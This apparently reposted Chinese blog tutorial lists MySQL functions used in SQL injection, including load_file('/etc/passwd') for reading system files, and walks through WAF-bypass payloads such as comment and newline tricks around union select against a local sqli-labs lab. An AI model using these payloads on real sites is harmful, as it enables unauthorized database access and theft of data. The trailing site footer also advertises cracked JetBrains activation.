sql注入常用函数与bypasswaf

0x00前言在sql注入当中会遇到各种各样的waf,如果需要bypass通常会涉及到一些冷门函数的运用,那么我们这时候就需要翻找手册来一个个查询,下面是我这几天收集到的一些常用函数,在waf过滤不

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

0x00  前言 

在sql注入当中会遇到各种各样的waf,如果需要bypass通常会涉及到一些冷门函数的运用,那么我们这时候就需要翻找手册来一个个查询,下面是我这几天收集到的一些常用函数,在waf过滤不严格的时候能有效的去绕过waf。

0x01  了解常见函数

system user() 系统用户名
concat() 连接字符串
user() 用户名
concat_ws() 含有分隔符地连接字符串 
current_user() 当前用户名
group_concat() 连接一个组的所有字符 串,并以逗号分隔每一条 数据 
session_user() 连接数据库 的用户名
load_file() 读取本地文件 
database() 数据库名
into outfile 写文件
version() 数据库版本 
ascii() 字符串的ASCII码值
@@datadir 数据库路径 
ord() 返回字符串第一个字符的 ASCII码值
@@basedir 数据库安装 路径 
mid() 返回一个字符串的一部分
@@version_compile_os 操作系统 
substr() 返回一个字符串的一部分 
count() 返回执行结 果数量 
length() 返回字符串的长度
substring   取值函数
div    除法运算函数 和/ 用法一样
mod: 取余数函数
hex():获取16进制的值

 

查询系统用户名

select system_user();

 

sql注入常用函数与bypasswaf

 

 

 

 

concat_ws 拼接函数

select concat_ws("|","a","b");

sql注入常用函数与bypasswaf

 

 

 这个也是一个拼接函数,在group_concat和concat被禁用的时候就可以使用到这个函数。

char_length 用法:

select char_length('123456') as abc;

 

计算值的长度命名为abc,在sql语法里面规则是这么定的,我也不知道为啥。

 

character_length

select character_length("123") as abc;

 

character_length的用法和char_length基本一样  功能也差不多

 

截取字符串函数

 

 

 

 select left("123",1);

 

从左边开始截取第一个值

select load_file('/etc/passwd');

读取本地的passwd文件

sql注入常用函数与bypasswaf

 

 

 @@datadir  显示数据库的路径

select @@datadir

 @@basedir  显示数据库的安装路径

select @@basedir

那么现在来尝试一下,正常查询语句拼接 and 语句来模拟注入。模拟现在waf 拦截and 1=1 的等于号,那么我们可以使用其他的运算符。

select * from users where id=1 and 1 div 1;

正常

select * from users where id=1 and 1 div 0;

报错

div 相当于sql语句里面的/ 斜杠 也就是除号。

select * from users where id=1 and 1 like 1;

正常

select * from users where id=1 and 1 like 0;

报错

 

like :模糊查询。

select * from users where id=1 and 1 * 1;

正常

select * from users where id=1 and 1 * 0;

报错

只要and 后面的条件成立等于true 就能执行能够判断是否存在注入。

比如绕过还可以使用到hex()这个函数

0x02  bypass waf

and 1=1拦截

and 1  拦截

 

sql注入常用函数与bypasswaf

 

and hex(0)

 

sql注入常用函数与bypasswaf

 

 

 

报错不拦截

 

and hex(1)

 

 

 

sql注入常用函数与bypasswaf

 

 

 

正常绕 and 判断。

那么再来爆出他的字段进行联合查询

order by  不拦截

order by   3正常

order by 4报错

  

字段为3个

使用联合查询来报错数据

 

sql注入常用函数与bypasswaf

 

 

 拦截  那么我们来fuzz一下他拦截的是哪个函数

那么我们还可以使用–+ 和%0a来绕过union select

union select 拦截

union 不拦截

select  不拦截

 

那么拦截的就是他们拼接一起。

我们这时候可以来把他中间的空格位置给fuzz一下。

union/**/select 拦截

union/*abc*/select 拦截

union/*!abc*/select 不拦截,但语句无法执行

 union--+/*!abc*/%0Aselect 语句能正常执行。

 

127.0.0.1/sqli-labs/Less-2/?id=-1.0union--+/*!abc*/%0Aselect 1,2,3

在id后面的位置呢可以加个.0来代替空格,因为mysql 不识别浮点型。

sql注入常用函数与bypasswaf

 

 

 再来试试其他方式

http://127.0.0.1/sqli-labs/Less-2/?id=-1.0union--+hex(0)%0Aselect%201,2,3

一样能成功查询出来。

这时候就可以结合到我们的查询函数user(),来查询看看

sql注入常用函数与bypasswaf

 

http://127.0.0.1/sqli-labs/Less-2/?id=-1.0union--+/*!abc*/%0Aselect%201,user(),3

拦截  那么他拦截的肯定是user()这个函数,再来fuzz一下

user不拦截

()不拦截

那么从他中间插入payload打乱正则。

sql注入常用函数与bypasswaf

 

 成功爆出数据。

0x03  结尾

咱也不知道该说啥,来插个表情包吧!

sql注入常用函数与bypasswaf

 

 

 

 

 

 

select concat_ws(“|”,”a”,”b”);

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/119977.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • idea激活码3月最新在线激活「建议收藏」

    idea激活码3月最新在线激活,https://javaforall.cn/100143.html。详细ieda激活码不妨到全栈程序员必看教程网一起来了解一下吧!

  • 博弈论案例分析题及答案_微软技术支持面试题

    博弈论案例分析题及答案_微软技术支持面试题相信下面这个问题很多人都见过,博弈论中经典案例–“强盗分金”,测试一下自己的逻辑是否正确五个海盗抢到了100颗宝石,每一颗都一样大小和价值连城。他们决定这么分:  抽签决定自己的号码(1、2、3、4、5)  首先,由1号提出分配方案,然后大家表决,当且仅当超过半数的人同意时,按照他的方案  进行分配,否则将被扔进大海喂鲨鱼  如果1号死后,…

    2022年10月16日
  • FFmpeg从入门到精通笔记之二

    FFmpeg从入门到精通笔记之二FFmpeg中常用的工具主要是ffmpeg、ffprobe、ffplay,它们分别用作多媒体的编解码工具、内容分析工具和播放器。ffmpeg常用命令ffmpeg的封装转换。ffmpeg的封装转换(转封装)功能包含在AVFormat模块中,通过libavformat库进行Mux和Demux操作.  *多媒体文件的格式有很多种,这些格式中的很多参数在Mux与Demux的操作参数中是公用的,…

  • JMH入门

    JMH入门1JMH介绍JMH是JavaMicroBenchmarkHarness的简写,是专门用于代码微基准测试的工具集(toolkit)。JMH是由实现Java虚拟机的团队开发的,因此他们非常清楚开发者所编写的代码在虚拟机中将会如何执行。由于现代JVM已经变得越来越智能,在Java文件的编译阶段、类的加载阶段,以及运行阶段都可能进行了不同程度的优化,因此开发者编写的代码在运行中未必会像自己所预期的那样具有相同的性能体现,JVM的开发者为了让普通开发者能够了解自己所编写的代码运行的情况,JMH便因此而生。

  • pycharm 激活成功教程 永久激活 (持续更新)_pycharm2017激活成功教程

    pycharm 激活成功教程 永久激活 (持续更新)_pycharm2017激活成功教程pycharm2017.1×64license服务器http://idea.imsxm.com/或者http://idea.liyang.io

  • 批处理for命令的用法_批处理主要解决

    批处理for命令的用法_批处理主要解决1.前言for是批处理中最复杂,也最强大的关键字。熟练掌握for的用法,才可能理解批处理的强大之处。2.基本用法2.1.概念for是对一组文件中的每一个文件执行某个特定命令。FOR%variableIN(set)DOcommand[command-parameters]%variable,指定一个单一字母可替换的参数。(set),指定一个或一组文…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号